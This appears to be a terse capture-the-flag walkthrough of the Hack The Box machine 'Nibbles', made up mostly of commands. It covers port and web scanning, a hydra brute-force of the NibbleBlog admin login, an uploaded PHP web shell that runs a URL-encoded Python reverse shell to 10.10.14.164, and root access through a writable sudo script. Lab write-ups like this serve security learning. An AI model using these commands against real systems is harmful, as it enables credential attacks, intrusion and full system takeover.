echo "10.129.87.224 nibbles.htb" | sudo tee -a /etc/hosts

nmap -A -p- -oA output 10.129.87.224 --min-rate=10000 --script=vuln --script-timeout=15 -v
nmap -T4 -oA output 10.129.87.224 --script=vuln -v
nmap -sT -sV -sC -Pn -p- 10.129.87.224

Pasted image 20210304221529.png

Pasted image 20210304221536.png

gobuster dir -u http://10.129.87.224/nibbleblog/ -w /usr/share/SecLists/Discovery/Web-Content/Common-PHP-Filenames.txt -t 20

Pasted image 20210304221819.png

nikto -h 10.129.87.224:80

Pasted image 20210304221840.png

Pasted image 20210304221846.png

hydra -l admin -P /usr/share/wordlist/rockyou.txt -vV -f -t 2 10.129.87.224 http-post-form "/nibbleblog/admin.php:username=^USER^&password=^PASS^:login_error"

Pasted image 20210304221944.png

https://curesec.com/blog/article/blog/NibbleBlog-403-Code-Execution-47.html

/usr/share/laudanum/wordpress/templates/php-reverse-shell.php

Pasted image 20210304221959.png

Pasted image 20210304222005.png

http://10.129.87.224/nibbleblog/content/private/plugins/my_image/image.php?cmd=python3%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.%20SOCK_STREAM);s.connect((%2210.10.14.164%22,5555));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import%20pty;%20pty.spawn(%22/bin/bash%22)%27

rlwrap nc -lvnp 5555 http://10.129.87.224/nibbleblog/content/private/plugins/my_image/image.php?cmd=python3%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.%20SOCK_STREAM);s.connect((%2210.10.14.164%22,5555));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import%20pty;%20pty.spawn(%22/bin/bash%22)%27

rlwrap nc -lvnp 5555

Pasted image 20210304222051.png

Pasted image 20210304222058.png

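nibbler@Nibbles:/$ cd /home/nibbler
nibbler@Nibbles:/home/nibbler$ mkdir -p personal/stuff
nibbler@Nibbles:/home/nibbler$ echo "/bin/bash" > personal/stuff/monitor.sh
nibbler@Nibbles:/home/nibbler$ chmod a=rwx personal/stuff/monitor.sh
nibbler@Nibbles:/home/nibbler$ sudo /home/nibbler/personal/stuff/monitor.sh
root@Nibbles:/home/nibbler# whoami

Root cause: the script run through sudo sits in a directory that nibbler can write to, so its contents are under the unprivileged user's control. Presumably a sudoers rule permits this exact path as root (the `sudo -l` output is not reproduced in the text here). A sudoers entry should only reference root-owned files in root-owned directories.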

Pasted image 20210304222115.png
